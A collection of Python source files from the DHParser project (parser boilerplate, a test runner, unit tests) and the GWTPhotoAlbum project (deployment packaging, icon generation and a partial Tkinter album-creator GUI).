#######################################################################
class XMLSnippetCompiler(Compiler):
"""Compiler for the abstract-syntax-tree of a XMLSnippet source file.
"""
def __init__(self):
super(XMLSnippetCompiler, self).__init__()
def reset(self):
super().reset()
# initialize your variables here, not in the constructor!
def on_document(self, node):
return self.fallback_compiler(node)
# def on_prolog(self, node):
# return node
# def on_XMLDecl(self, node):
# return node
# def on_VersionInfo(self, node):
# return node
# def on_VersionNum(self, node):
# return node
# def on_EncodingDecl(self, node):
# return node
# def on_EncName(self, node):
# return node
# def on_SDDecl(self, node):
# return node
# def on_Yes(self, node):
# return node
# def on_No(self, node):
# return node
# def on_doctypedecl(self, node):
# return node
# def on_ExternalID(self, node):
# return node
# def on_intSubset(self, node):
# return node
# def on_element(self, node):
# return node
# def on_STag(self, node):
# return node
# def on_ETag(self, node):
# return node
# def on_emptyElement(self, node):
# return node
# def on_TagName(self, node):
# return node
# def on_Attribute(self, node):
# return node
# def on_content(self, node):
# return node
# def on_EntityValue(self, node):
# return node
# def on_AttValue(self, node):
# return node
# def on_SystemLiteral(self, node):
# return node
# def on_PubidLiteral(self, node):
# return node
# def on_Reference(self, node):
# return node
# def on_EntityRef(self, node):
# return node
# def on_PEReference(self, node):
# return node
# def on_Nmtokens(self, node):
# return node
# def on_Nmtoken(self, node):
# return node
# def on_Names(self, node):
# return node
# def on_Name(self, node):
# return node
# def on_NameStartChar(self, node):
# return node
# def on_NameChars(self, node):
# return node
# def on_Misc(self, node):
# return node
# def on_Comment(self, node):
# return node
# def on_PI(self, node):
# return node
# def on_PITarget(self, node):
# return node
# def on_CDSect(self, node):
# return node
# def on_PubidCharsSingleQuoted(self, node):
# return node
# def on_PubidChars(self, node):
# return node
# def on_CharData(self, node):
# return node
# def on_CData(self, node):
# return node
# def on_IgnoreChars(self, node):
# return node
# def on_PIChars(self, node):
# return node
# def on_CommentChars(self, node):
# return node
# def on_CharRef(self, node):
# return node
# def on_Chars(self, node):
# return node
# def on_Char(self, node):
# return node
# def on_S(self, node):
# return node
# def on_EOF(self, node):
# return node
def get_compiler() -> XMLSnippetCompiler:
"""Returns a thread/process-exclusive XMLSnippetCompiler-singleton."""
THREAD_LOCALS = access_thread_locals()
try:
compiler = THREAD_LOCALS.XMLSnippet_00000001_compiler_singleton
except AttributeError:
THREAD_LOCALS.XMLSnippet_00000001_compiler_singleton = XMLSnippetCompiler()
compiler = THREAD_LOCALS.XMLSnippet_00000001_compiler_singleton
return compiler
#######################################################################
#
# END OF DHPARSER-SECTIONS
#
#######################################################################
def compile_src(source):
"""Compiles ``source`` and returns (result, errors, ast).
"""
result_tuple = compile_source(source, get_preprocessor(), get_grammar(), get_transformer(),
get_compiler())
return result_tuple
if __name__ == "__main__":
# recompile grammar if needed
grammar_path = os.path.abspath(__file__).replace('Parser.py', '.ebnf')
parser_update = False
def notify():
global parser_update
parser_update = True
print('recompiling ' + grammar_path)
if os.path.exists(grammar_path):
if not recompile_grammar(grammar_path, force=False, notify=notify):
error_file = os.path.basename(__file__).replace('Parser.py', '_ebnf_ERRORS.txt')
with open(error_file, encoding="utf-8") as f:
print(f.read())
sys.exit(1)
elif parser_update:
print(os.path.basename(__file__) + ' has changed. '
'Please run again in order to apply updated compiler')
sys.exit(0)
else:
print('Could not check whether grammar requires recompiling, '
'because grammar was not found at: ' + grammar_path)
if len(sys.argv) > 1:
# compile file
file_name, log_dir = sys.argv[1], ''
if file_name in ['-d', '--debug'] and len(sys.argv) > 2:
file_name, log_dir = sys.argv[2], 'LOGS'
set_config_value('history_tracking', True)
set_config_value('resume_notices', True)
set_config_value('log_syntax_trees', set(('cst', 'ast')))
start_logging(log_dir)
result, errors, _ = compile_src(file_name)
if errors:
cwd = os.getcwd()
rel_path = file_name[len(cwd):] if file_name.startswith(cwd) else file_name
for error in errors:
print(rel_path + ':' + str(error))
sys.exit(1)
else:
print(result.serialize() if isinstance(result, Node) else result)
else:
print("Usage: XMLSnippetParser.py [FILENAME]")
```
#### File: DHParser/tests/run.py
```python
import concurrent.futures
import doctest
import os
import subprocess
import sys
import time
import threading
scriptdir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(scriptdir, '../'))
from DHParser.configuration import get_config_value
from DHParser.toolkit import instantiate_executor
lock = None # threading.Lock() initialized in __main__
def run_cmd(parameters: list):
try:
subprocess.run(parameters)
return True
except FileNotFoundError:
return False
def run_doctests(module):
with lock:
namespace = {}
print('DOCTEST ' + module)
exec('import DHParser.' + module, namespace)
mod = getattr(namespace['DHParser'], module)
result = doctest.testmod(mod)
return result.failed
def run_unittests(command):
# print('>>>>>>>> ', command)
args = command.split(' ')
filename = args[1]
print('\nUNITTEST ' + args[0] + ' ' + filename)
subprocess.run(args)
print('COMPLETED ' + args[0] + ' ' + filename + '\n')
if __name__ == "__main__":
lock = threading.Lock()
found = []
if run_cmd(['pypy3', '-V']):
found.append('pypy3 ')
elif run_cmd(['pypy36', '-V']):
found.append('pypy36 ')
elif run_cmd(['pypy', '-V']):
found.append('pypy ')
if run_cmd(['python', '-V']):
output = subprocess.run(['python', '-V'], capture_output=True).stdout
if output.find(b'Python 3') >= 0:
found.append('python ')
elif run_cmd(['python3', '-V']):
found.append('python3')
elif run_cmd(['python3', '-V']):
found.append('python3')
# if run_cmd(['python3.5', '-V']):
# found.append('python3.5 ')
# elif run_cmd(['~/.local/bin/python3.5', '-V']):
# found.append('~/.local/bin/python3.5 ')
if run_cmd(['python3.6', '-V']):
found.append('python3.6 ')
elif run_cmd(['~/.local/bin/python3.6', '-V']):
found.append('~/.local/bin/python3.6 ')
if run_cmd(['python3.7', '-V']):
found.append('python3.7 ')
elif run_cmd(['~/.local/bin/python3.7', '-V']):
found.append('~/.local/bin/python3.7 ')
if run_cmd(['python3.8', '-V']):
found.append('python3.8 ')
elif run_cmd(['~/.local/bin/python3.8', '-V']):
found.append('~/.local/bin/python3.8 ')
if run_cmd(['python3.9', '-V']):
found.append('python3.9 ')
elif run_cmd(['~/.local/bin/python3.9', '-V']):
found.append('~/.local/bin/python3.9 ')
if run_cmd(['python3.10', '-V']):
found.append('python3.10 ')
elif run_cmd(['~/.local/bin/python3.10', '-V']):
found.append('~/.local/bin/python3.10 ')
print('Interpreters found: ' + ''.join(found))
arguments = [arg for arg in sys.argv[1:] if arg[:1] != '-']
if len(arguments) > 1:
# use interpreters from command line
interpreters = []
for interpreter in arguments:
interpreter = interpreter.strip() + ' '
if interpreter not in found:
print('Interpreter ' + arguments[1] + ' not found.')
sys.exit(1)
else:
interpreters.append(interpreter)
else:
interpreters = found
cwd = os.getcwd()
os.chdir(os.path.join(scriptdir, '..'))
timestamp = time.time()
run_doctests('toolkit')
with instantiate_executor(get_config_value('test_parallelization'),
concurrent.futures.ProcessPoolExecutor) as pool:
results = []
# doctests
for filename in os.listdir('DHParser'):
if filename.endswith('.py') and filename not in \
("foreign_typing.py", "shadow_cython.py", "versionnumber.py",
"__init__.py"):
results.append(pool.submit(run_doctests, filename[:-3]))
# unit tests
for interpreter in interpreters:
if run_cmd([interpreter.strip(), '--version']):
for filename in os.listdir('tests'):
if filename.endswith('.py') and (filename.startswith('test_') or
filename.startswith('notest')):
command = interpreter + os.path.join('tests', filename)
results.append(pool.submit(run_unittests, command))
done, not_done = concurrent.futures.wait(results, timeout=120)
assert not not_done, str(not_done)
elapsed = time.time() - timestamp
print('\n Test-Duration: %.2f seconds' % elapsed)
print('\nPlease note, the following phenomena are not bugs:')
print(' 1. Some doctests may fail on Windows, due to different file-separators.')
print(' 2. Some tests end with OSError("handle already closed") on pypy3.6, 3.7. '
'This seems to be a python < 3.9 bug. See: pypy3 scratch/process_pool_doc_examples.py')
os.chdir(cwd)
```
#### File: DHParser/tests/test_compile.py
```python
import copy
import os
import sys
scriptpath = os.path.dirname(__file__) or '.'
sys.path.append(os.path.abspath(os.path.join(scriptpath, '..')))
from DHParser.syntaxtree import parse_sxpr
from DHParser.compile import Compiler
class ZeroTestCompiler(Compiler):
pass
class SerializingTestCompiler(Compiler):
def serialize(self, node):
if node.children:
content = [self.compile(child) for child in node.children]
return ' '.join(['(' + node.tag_name] + content) + ')'
else:
return '(' + node.tag_name + ' ' + node.content + ')'
def on_A(self, node):
return self.serialize(node)
def on_B(self, node):
return self.serialize(node)
def on_C(self, node):
return self.serialize(node)
def on_D(self, node):
return self.serialize(node)
def on_E(self, node):
return self.serialize(node)
def on_F(self, node):
return self.serialize(node)
class TestCompilerClass:
original = parse_sxpr('(A (B "1") (C (D (E "2") (F "3"))))')
def test_zero_compiler(self):
"""Tests the fallback-method and boilerplate of the compiler."""
tree = copy.deepcopy(self.original)
compiler = ZeroTestCompiler()
tree = compiler.compile(tree)
assert tree.equals(self.original), tree.as_sxpr()
def test_non_Node_return_type(self):
"""Tests a compiler that returns strings, not Nodes."""
tree = copy.deepcopy(self.original)
compiler = SerializingTestCompiler()
s = compiler.compile(tree)
assert s == "(A (B 1) (C (D (E 2) (F 3))))"
def test_fallback_failure1(self):
"""Tests failure when leaf-node is mistakenly handled by fallback."""
tree = copy.deepcopy(self.original)
compiler = SerializingTestCompiler()
compiler.on_F = compiler.fallback_compiler
try:
s = compiler.compile(tree)
assert False, "TypeError expected"
except TypeError:
pass
def test_fallback_failure2(self):
"""Tests failure when branch-node is mistakenly handled by fallback."""
tree = copy.deepcopy(self.original)
compiler = SerializingTestCompiler()
compiler.on_D = compiler.fallback_compiler
try:
s = compiler.compile(tree)
assert False, "TypeError expected"
except TypeError as e:
assert "DHParser.compile.Compiler.fallback_compiler()" in str(e), \
"Incorrect Error Message: " + str(e)
pass
if __name__ == "__main__":
from DHParser.testing import runner
runner("", globals())
```
#### File: DHParser/tests/test_server_utils.py
```python
import asyncio
import concurrent.futures
import collections.abc
import json
import os
import sys
import traceback
scriptpath = os.path.dirname(__file__) or '.'
sys.path.append(os.path.abspath(os.path.join(scriptpath, '..')))
from DHParser.server import pp_json, ExecutionEnvironment, asyncio_run
from DHParser.toolkit import json_dumps, json_encode_string
class TestExecutionEnvironment:
def test_execenv(self):
def fault():
raise AssertionError
async def main():
loop = asyncio.get_running_loop() if sys.version_info >= (3, 7) \
else asyncio.get_event_loop()
env = ExecutionEnvironment(loop)
return await env.execute(None, fault, [])
result, rpc_error = asyncio_run(main())
json_str = '{"jsonrpc": "2.0", "error": {"code": %i, "message": %s}}' % \
(rpc_error[0], json_encode_string(rpc_error[1]))
assert json_str.find('Traceback') >= 0
class TestUtils:
data = ('{"jsonrpc":"2.0","id":0,"method":"initialize","params":{"processId":17666,'
'"rootPath":"/home/eckhart/Entwicklung/DHParser/examples/EBNF_fork","rootUri":'
'"file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork","capabilities":'
'{"workspace":{"applyEdit":true,"workspaceEdit":{"documentChanges":true},'
'"didChangeConfiguration":{"dynamicRegistration":true},"didChangeWatchedFiles":'
'{"dynamicRegistration":true},"symbol":{"dynamicRegistration":true,"symbolKind":'
'{"valueSet":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,'
'26]}},"executeCommand":{"dynamicRegistration":true},"configuration":true,'
'"workspaceFolders":true},"textDocument":{"publishDiagnostics":'
'{"relatedInformation":true},"synchronization":{"dynamicRegistration":true,'
'"willSave":true,"willSaveWaitUntil":true,"didSave":true},"completion":'
'{"dynamicRegistration":true,"contextSupport":true,"completionItem":'
'{"snippetSupport":true,"commitCharactersSupport":true,"documentationFormat":'
'["markdown","plaintext"],"deprecatedSupport":true,"preselectSupport":true},'
'"completionItemKind":{"valueSet":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'
'19,20,21,22,23,24,25]}},"hover":{"dynamicRegistration":true,"contentFormat":'
'["markdown","plaintext"]},"signatureHelp":{"dynamicRegistration":true,'
'"signatureInformation":{"documentationFormat":["markdown","plaintext"]}},'
'"definition":{"dynamicRegistration":true},"references":{"dynamicRegistration":'
'true},"documentHighlight":{"dynamicRegistration":true},"documentSymbol":'
'{"dynamicRegistration":true,"symbolKind":{"valueSet":[1,2,3,4,5,6,7,8,9,10,11,'
'12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]},'
'"hierarchicalDocumentSymbolSupport":true},"codeAction":{"dynamicRegistration":'
'true,"codeActionLiteralSupport":{"codeActionKind":{"valueSet":["","quickfix",'
'"refactor","refactor.extract","refactor.inline","refactor.rewrite","source",'
'"source.organizeImports"]}}},"codeLens":{"dynamicRegistration":true},'
'"formatting":{"dynamicRegistration":true},"rangeFormatting":'
'{"dynamicRegistration":true},"onTypeFormatting":{"dynamicRegistration":true},'
'"rename":{"dynamicRegistration":true},"documentLink":{"dynamicRegistration":'
'true},"typeDefinition":{"dynamicRegistration":true},"implementation":'
'{"dynamicRegistration":true},"colorProvider":{"dynamicRegistration":true},'
'"foldingRange":{"dynamicRegistration":true,"rangeLimit":5000,"lineFoldingOnly":'
'true}}},"trace":"off","workspaceFolders":[{"uri":'
'"file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",'
'"name":"EBNF_fork"}]}}')
expected = """{
"jsonrpc": "2.0",
"id": 0,
"method": "initialize",
"params": {
"processId": 17666,
"rootPath": "/home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",
"rootUri": "file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",
"capabilities": {
"workspace": {
"applyEdit": true,
"workspaceEdit": {"documentChanges": true},
"didChangeConfiguration": {"dynamicRegistration": true},
"didChangeWatchedFiles": {"dynamicRegistration": true},
"symbol": {
"dynamicRegistration": true,
"symbolKind": {
"valueSet": [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]}},
"executeCommand": {"dynamicRegistration": true},
"configuration": true,
"workspaceFolders": true},
"textDocument": {
"publishDiagnostics": {"relatedInformation": true},
"synchronization": {
"dynamicRegistration": true,
"willSave": true,
"willSaveWaitUntil": true,
"didSave": true},
"completion": {
"dynamicRegistration": true,
"contextSupport": true,
"completionItem": {
"snippetSupport": true,
"commitCharactersSupport": true,
"documentationFormat": ["markdown","plaintext"],
"deprecatedSupport": true,
"preselectSupport": true},
"completionItemKind": {
"valueSet": [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25]}},
"hover": {
"dynamicRegistration": true,
"contentFormat": ["markdown","plaintext"]},
"signatureHelp": {
"dynamicRegistration": true,
"signatureInformation": {
"documentationFormat": ["markdown","plaintext"]}},
"definition": {"dynamicRegistration": true},
"references": {"dynamicRegistration": true},
"documentHighlight": {"dynamicRegistration": true},
"documentSymbol": {
"dynamicRegistration": true,
"symbolKind": {
"valueSet": [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26]},
"hierarchicalDocumentSymbolSupport": true},
"codeAction": {
"dynamicRegistration": true,
"codeActionLiteralSupport": {
"codeActionKind": {
"valueSet": ["","quickfix","refactor","refactor.extract","refactor.inline","refactor.rewrite","source","source.organizeImports"]}}},
"codeLens": {"dynamicRegistration": true},
"formatting": {"dynamicRegistration": true},
"rangeFormatting": {"dynamicRegistration": true},
"onTypeFormatting": {"dynamicRegistration": true},
"rename": {"dynamicRegistration": true},
"documentLink": {"dynamicRegistration": true},
"typeDefinition": {"dynamicRegistration": true},
"implementation": {"dynamicRegistration": true},
"colorProvider": {"dynamicRegistration": true},
"foldingRange": {
"dynamicRegistration": true,
"rangeLimit": 5000,
"lineFoldingOnly": true}}},
"trace": "off",
"workspaceFolders": [{
"uri": "file:///home/eckhart/Entwicklung/DHParser/examples/EBNF_fork",
"name": "EBNF_fork"}]}}"""
def test_pp_json(self):
obj = json.loads(self.data)
serialized = pp_json(obj)
assert sys.version_info < (3, 6) or serialized == self.expected, serialized
def test_pp_json_stacktrace(self):
try:
raise AssertionError()
except AssertionError:
tb = traceback.format_exc()
ppjsn = pp_json({'error' : tb}).replace('\\\\', '/')
expected = '{"error": "Traceback (most recent call last):"\n' \
' " File \\"$SCRIPTPATH/test_server_utils.py\\", ' \
'line 178, in test_pp_json_stacktrace"\n' \
' " raise AssertionError()"\n' \
' "AssertionError"\n ""}'.\
replace('$SCRIPTPATH', scriptpath.replace('\\', '/'), 1).replace('./', '')
# print(ppjsn)
# print(expected)
assert ppjsn == expected, '\n\n' + ppjsn + '\n\n' + expected
if __name__ == "__main__":
from DHParser.testing import runner
runner("", globals())
```
|
{
"source": "jecki/gwtphotoalbum",
"score": 2
}
|
#### File: GWTPhotoAlbum/scripts/genDeploymentPackage.py
```python
import sys, os
try:
import zipfile
except (ImportError):
import zipfile_py2x as zipfile
class emptyCompressor(object):
def __init__(self, fileName):
pass
def write(self, src, arcName):
pass
def close(self):
pass
try:
from PyQt4.Qt import QByteArray, qCompress
class QtCompressor(object):
def __init__(self, fileName):
# fileName = os.path.splitext(fileName)[0] + ".qz"
self.fileName = fileName
self.byteArray = QByteArray()
def toHexStr(self, i):
s = hex(i)
k = 10 - len(s)
return s[0:2] + "0"*k + s[2:]
def write(self, src, arcName):
g = open(src, "rb")
data = g.read()
g.close()
self.byteArray.append(self.toHexStr(len(arcName)))
self.byteArray.append(arcName)
self.byteArray.append(self.toHexStr(len(data)))
self.byteArray.append(data)
def close(self):
f = open(self.fileName, "wb")
# don't use compression, because resource files are compressed by Qt anyway
data = self.byteArray.data() #data = qCompress(self.byteArray, 9).data()
f.write(data)
f.close()
except ImportError:
QtCompressor = emptyCompressor
source_dir = "../war"
version_file_path = "../VERSION.txt"
dest_file_name = "GWTPhotoAlbum-Deploy.zip"
qz_file_name = "../albumcreator/common/data/GWTPhotoAlbum-Deploy.qa"
if not os.path.exists(os.path.dirname(qz_file_name)):
print ("No albumcreator sources: Won't create GWTPhotoAlbum-Deploy.qa!")
QtCompressor = emptyCompressor
def verify_source_dir():
if not os.path.isdir(source_dir):
print ("error: "+source_dir+" is not a valid directory")
return False;
names = os.listdir(source_dir)
if "icons" not in names:
print ("error: "+source_dir+"does not contain an 'icons' subdirctory")
return False
if "GWTPhotoAlbum" not in names:
print ("error: "+source_dir+"does not contain an 'GWTPhotoAlbum' subdirctory")
return False
l = [entry for entry in names if entry.endswith(".html")]
if len(l) == 0:
print ("error: "+source_dir+"does not contain any html files")
return False
return True
def assemble():
f = zipfile.ZipFile(dest_file_name, "w", zipfile.ZIP_DEFLATED)
g = QtCompressor(qz_file_name)
f.write(version_file_path, "VERSION.txt")
g.write(version_file_path, "VERSION.txt")
try:
def visit(arg, dirname, names):
pathname = (os.path.normpath(dirname[len(source_dir):]), "")
while pathname[0] not in ["", "/"]:
pathname = os.path.split(pathname[0])
if pathname[1] not in ["GWTPhotoAlbum", "icons", "."] or \
dirname.find(".svn") >= 0:
print ("ignoring directory: " + dirname)
return
else:
print ("including directory: " + dirname)
if os.path.samefile(dirname, source_dir):
for entry in names[:]:
if entry.find("Demo") >= 0 \
or (os.path.isdir(os.path.join(dirname, entry)) \
and entry not in ("gwt", "icons", # "GWTPhotoAlbum"
"GWTPhotoAlbum")) \
or entry in ["index.html", "index_offline.html",
"GWTPhotoAlbum_offline.html",
"GWTPhotoAlbum_xs.html"] \
or entry.find("_fat") >= 0 \
or entry.startswith("noscript_") :
print ("ignoring: "+entry)
names.remove(entry)
for entry in names[:]:
if entry.find(".svn") >= 0 or entry in ["hosted.html"]:
print ("ignoring: "+entry)
names.remove(entry)
for entry in names:
absolute_path = os.path.join(dirname, entry)
if not os.path.isdir(absolute_path):
relative_path = absolute_path[len(source_dir)+1:]
# if entry == "GWTPhotoAlbum.html" or entry == "GWTPhotoAlbum.css":
# relative_path = os.path.join("GWTPhotoAlbum", relative_path)
print ("adding: "+relative_path)
f.write(absolute_path, relative_path)
g.write(absolute_path, relative_path)
try:
os.path.walk(source_dir, visit, None)
except (AttributeError): # python3 !
for dirpath, dirnames, filenames in os.walk(source_dir):
visit(0, dirpath, dirnames + filenames)
# except zipfile.error, IOError:
# print ("Error writing zip-file!")
finally:
f.close()
g.close()
if __name__ == "__main__":
if "-h" in sys.argv or "--help" in sys.argv:
print (__doc__)
else:
if len(sys.argv) > 1:
source_dir = sys.argv[1]
if len(sys.argv) > 2:
dest_file_name = sys.argv[2]
if len(sys.argv) > 3:
qz_file_name = sys.argv[3]
if verify_source_dir():
print ("source directory: " + source_dir)
print ("destination file: " + dest_file_name)
print ("qz archive file: " + qz_file_name)
assemble()
```
#### File: GWTPhotoAlbum/scripts/genNavigationImages.py
```python
import os, sys
from math import sqrt
from PIL import Image, ImageFile
src_prefix = "../iconsets/"
src_dir = os.path.join(src_prefix, "grey")
dst_dirs = [ "../war/icons" ]
#dst_dir = "/home/eckhart/tmp"
## begin and end buttons are not needed any more
#base_names = ["begin", "begin_down", "back", "back_down",
# "gallery", "gallery_down", "play", "pause",
# "next", "next_down", "end", "end_down"]
base_names = ["back", "back_down", "gallery", "gallery_down",
"play", "pause", "next", "next_down"]
file_type = ".png"
copy_only_names = ["start.png", "start_down.png"]
im_sizes = [64, 48, 32, 24, 16]
def greyFilter(rgba, weight):
m = sum(rgba[0:3])/3.0
r = int(m * weight + rgba[0]*(1.0-weight))
g = int(m * weight + rgba[1]*(1.0-weight))
b = int(m * weight + rgba[2]*(1.0-weight))
return (r,g,b,rgba[3])
def brighten(rgba, e):
r,g,b,a = rgba
r = int(r**e * (256/(256**e)))
g = int(g**e * (256/(256**e)))
b = int(b**e * (256/(256**e)))
return (r,g,b,a)
def myfilter(rgba):
return brighten(greyFilter(rgba, 0.5), 0.6)
def apply(image, filter):
pix = image.load()
for x in range(image.size[0]):
for y in range(image.size[1]):
pix[x,y] = filter(pix[x,y])
def createSmallSizes(base_name):
try:
im = Image.open(os.path.join(src_dir, base_name+file_type))
srcW, srcH = im.size
for destH in im_sizes:
if destH != im.size[1]:
destW = srcW * destH / srcH
dest = im.resize((destW, destH), Image.ANTIALIAS)
else:
dest = im.copy()
if src_dir.find("colored") >= 0:
apply(dest, myfilter)
for dst_dir in dst_dirs:
dest.save(os.path.join(dst_dir,base_name+"_"+str(destH)+file_type),
optimize=1, transparacy = (255, 255, 255)) # transparacy, bits
except (IOError, err):
print ("IOError", err)
def genNavigationImages():
for name in base_names:
createSmallSizes(name)
for name in copy_only_names:
for dst_dir in dst_dirs:
with open(os.path.join(src_dir, name), "rb") as src:
with open(os.path.join(dst_dir, name), "wb") as dst:
data = src.read()
dst.write(data)
if __name__ == "__main__":
if len(sys.argv) > 1:
src_dir = os.path.join(src_prefix, sys.argv[1])
genNavigationImages()
```
#### File: GWTPhotoAlbum/scripts/GWTPhotoAlbumCreator.py
```python
import os, re
from Tkinter import *
from tkMessageBox import askyesno, showerror
import tkFileDialog
import Image, ImageTk
import createGWTPhotoAlbum
from createGWTPhotoAlbum import read_caption, write_caption, \
remove_old_directories, create_directories, \
create_noscript_html, create_index_page, \
assemble, deploy, THUMBNAIL, FULLSIZE
try:
import json # python 2.6 and higher...
def toJSON(var, indentation=2):
return json.dumps(var, sort_keys=True, indent=indentation)
def fromJSON(jsonString):
return json.loads(jsonString)
except ImportError:
def toJSON(var, indentation=2):
return repr(var)
def fromJSON(jsonString):
return eval(jsonString)
VERSION = "0.8.9"
about_text="GWTPhotoAlbumCreater.py\n\nVersion "+VERSION+"\n\n"+\
"""
A program to create an html/AJAX photo album from a collection of images.
See: http://code.google.com/p/gwtphotoalbum/ for more information and
source codes
Copyright (C) 2008-2013 <NAME> (<EMAIL> <EMAIL>).
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
"""
FRAME_W, FRAME_H = 780, 560
selectableResolutions = ((320, 240), (640, 480), (1024, 768),
(1440, 900), (1920, 1200))
def parseFileNameString(s):
"""Returns a list of files contained in the string."""
l = []; i = 0; N = len(s)
while i < N:
while s[i] == " ": i += 1
if s[i] == "{":
k = i+1
while k < N and s[k] != "}": k += 1
l.append(s[i+1:k])
i = k+1
else:
k = i+1
while k < N and s[k] != " ": k += 1
l.append(s[i:k])
i = k+1
return l
def compatibleFileDialogResult(listOrString):
"""Makes sure that the return value of a tk file dialog is a list
of strings and not single string as on Windows platforms."""
if type(listOrString) == type("") \
or type(listOrString) == type(u""):
flist = parseFileNameString(listOrString)
else:
flist = listOrString
return [os.path.normpath(path) for path in flist]
class ThumbDB:
def __init__(self, w = 240, h = 240):
self.W, self.H = w, h
self.thumbs = {}
self.quickThumbs = {}
self.register = {}
def get(self, filepath, width=-1, height=-1):
if width <= 0: width = self.W
if height <= 0: height = self.H
if (width, height, filepath) in self.quickThumbs:
return self.quickThumbs[(width, height, filepath)]
if filepath not in self.thumbs \
or width >= self.W or height >= self.H:
try:
img = Image.open(filepath)
img.load()
x = max(self.W, width)
y = max(self.H, height)
w, h = createGWTPhotoAlbum.adjustSize(img.size, (x, y))
img = img.resize((2*w, 2*h), Image.NEAREST)
self.thumbs[filepath] = img
except IOError:
showerror(title = "Error:",
message = "could not open file " +
self.album.files(self.selection))
return None
img = self.thumbs[filepath]
w,h = createGWTPhotoAlbum.adjustSize(img.size, (width, height))
img = img.resize((w, h), Image.BILINEAR)
tkimg = ImageTk.PhotoImage(img)
if filepath not in self.register or self.register[filepath] <= 3:
self.quickThumbs[(width, height, filepath)] = tkimg
self.register[filepath] = self.register.setdefault(filepath, 0)+1
return tkimg
thumbDb = ThumbDB()
class WebAlbum:
def __init__(self):
self.entries = []
self.files = {}
self.captions = {}
self.captionsTouched = set()
self.compression = (85, 70)
sr = selectableResolutions
self.resolutions = set(sr)
self.gallery = True
self.title = ""
self.subtitle = ""
self.bottomline = ""
self.fullscreen = True
self.filmstrip = True
self.originals = False
self.overblend = False
self.createhtml = True
self.addjsontohtml = True
self.destfolder = "album"
def createWebAlbum(self, logger = lambda name: 0):
"""Creates the GWTPhotoAlbum. Returns True, if everything went fine."""
if os.path.exists(self.destfolder):
showerror(title="GWTPhotoAlbumCreator.py - error!",
message="Directory:\n%s\n"%self.destfolder+
"already exists!\nPlease chose a different "+
"output directory name.")
return False
save_info = createGWTPhotoAlbum.info
info = {}; info.update(save_info)
info["title"] = self.title
info["subtitle"] = self.subtitle
info["image clickable"] = "true"
if self.gallery: info["presentation type"] = "gallery"
else: info["presentation type"] = "slideshow"
info["disable scrolling"] = "true"
if self.fullscreen:
if self.filmstrip:
info["layout type"] = "fullscreen"
info["layout data"] = "IOFT"
else:
info["layout type"] = "fullscreen"
info["layout data"] = "CIPT"
else:
if self.filmstrip:
info["layout type"] = "tiled"
info["layout data"] = "ICFT"
else:
info["layout type"] = "tiled"
info["layout data"] = "ICPT"
if self.overblend:
info["image fading"] = "1000"
else:
info["image fading"] = "-750"
filelist = [self.files[entry] for entry in self.entries]
sizes = list(self.resolutions)
sizes.sort()
sizes.insert(0, THUMBNAIL)
if self.originals:
createGWTPhotoAlbum.create_picture_archive = True
#createGWTPhotoAlbum.archive_quality = 80
if self.bottomline == "":
self.bottomline = '<a href="pictures.zip">download all pictures</a>'
#sizes.append(FULLSIZE)
else:
createGWTPhotoAlbum.create_picture_archive = False
info["bottom line"] = self.bottomline
#for key in self.captions:
# self.captions[key] = re.sub("\\\n", "<br />", self.captions[key])
createGWTPhotoAlbum.info.update(info)
logger("creating directory: "+ self.destfolder)
remove_old_directories(self.destfolder)
create_directories(self.destfolder)
createGWTPhotoAlbum.quick_scaling = False
logger("assembling images...")
assemble(filelist, self.destfolder, sizes, self.compression[0],
self.compression[1], self.captions, logger)
logger("deploying AJAX scripts in: "+ self.destfolder)
deploy(createGWTPhotoAlbum.deploy_pack, self.destfolder,
self.addjsontohtml)
if self.createhtml:
logger("creating static html pages for browsers without javascript.")
create_noscript_html(filelist, self.destfolder, sizes)
create_index_page(self.destfolder, self.createhtml, self.addjsontohtml)
createGWTPhotoAlbum.info.update(save_info)
return True
def add(self, filepath):
"""Adds the image at location 'filepath'. Returns file name w/o path.
"""
name = os.path.basename(filepath)
if name in self.entries:
showerror(title="GWTPhotoAlbumCreator.py - Error!",
message="An image named\n%s\nalready "%name+
"exists in the gallery!")
return
caption = read_caption(filepath)
if caption: self.captions[name] = caption
else: self.captions[name] = ""
self.entries.append(name)
self.files[name] = filepath
return name
def remove(self, name):
"""Removes the image with the filename 'name' (not the full path!).
"""
self.entries.remove(name)
del self.files[name]
if name in self.captions: del self.captions[name]
if name in self.captionsTouched: self.captionsTouched.remove(name)
def getCaption(self, name):
"""Returns the caption associated with the image 'name'."""
if name in self.captions:
return re.sub("(<br />)|(<br>)", "\n", self.captions[name])
return self.captions[name]
else:
return ""
def changeCaption(self, name, caption, writeToFile = False):
"""Changes the caption of image 'name' to 'caption'.
Optionally, writes the new caption to the image file after changeing.
"""
assert name in self.entries
while len(caption) > 0 and caption[-1] == "\n": caption = caption[:-1]
caption = re.sub("\\\n", "<br />", caption)
if name not in self.captions or self.captions[name] != caption:
self.captionsTouched.add(name)
self.captions[name] = caption
if writeToFile:
write_caption(self.files[name], caption)
def writeBackCaptions(self):
for name in self.captionsTouched:
write_caption(self.files[name], self.captions[name])
self.captionsTouched = set()
def strippedCaptions(self):
"""Returns the captions dictionary with all empty captions eliminated.
"""
stripped = {}
for key, value in self.captions.items():
if value:
stripped[key] = value
return stripped
def pick(self, centerImg):
"""Returns the paths names of the images:
centerImg-1, centerImg, centerImg+1"""
ret = []
if centerImg > 0:
ret.append(self.files[self.entries[centerImg-1]])
else:
ret.append(None)
ret.append(self.files[self.entries[centerImg]])
if centerImg < len(self.entries)-1:
